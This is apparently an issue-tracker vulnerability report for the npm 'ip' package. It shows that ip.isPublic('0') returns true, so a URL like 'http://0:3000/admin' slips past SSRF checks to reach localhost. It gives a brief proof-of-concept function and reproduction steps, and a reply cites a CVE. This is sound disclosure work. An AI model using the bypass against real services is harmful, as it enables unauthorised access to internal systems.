Additional SSRF Bypass: Null Route Format (`"0"`)

[emredurmaz4]

Additional SSRF Bypass: Null Route Format ("0")

Summary

An additional critical SSRF bypass vulnerability affecting the ip.isPublic() function that was not covered in the existing Issue #150.

Vulnerability Details

The input "0" (null route) is incorrectly classified as a public IP address, allowing SSRF bypass attacks:

const ip = require('ip');

console.log(ip.isPublic("0"));     // true ❌ (should be false)
console.log(ip.isPrivate("0"));    // false ❌ (should be true)

// Correct behavior:
console.log(ip.isPublic("127.0.0.1"));  // false ✅

Impact

• Severity: Critical SSRF bypass
• Attack vector: http://0:port/path URLs bypass IP validation
• Network behavior: "0" resolves to 127.0.0.1 (localhost)

Proof of Concept

// Typical vulnerable application
function makeRequest(userUrl) {
    const hostname = new URL(userUrl).hostname;
    
    if (ip.isPublic(hostname)) {
        return fetch(userUrl); // BYPASSED!
    }
    throw new Error("Private IP blocked");
}

// Attack succeeds:
makeRequest("http://0:3000/admin");  // Accesses localhost:3000

Reproduction Steps

1. Install: npm install ip@2.0.1
2. Test: node -e "const ip=require('ip'); console.log(ip.isPublic('0'));"
3. Result: true (indicates bypass)

Relationship to Issue #150

This null route bypass complements the other techniques reported in Issue #150 (127.1, 127.0.1, etc.) but was not included in that list.

Affected Version

• Package: ip@2.0.1 (current latest)
• Downloads: 5+ million weekly

---

Request: Please consider adding this bypass to the existing security advisory or assign a CVE for comprehensive coverage of all bypass techniques.

[carnil]

This appears to be https://www.cve.org/CVERecord?id=CVE-2025-59437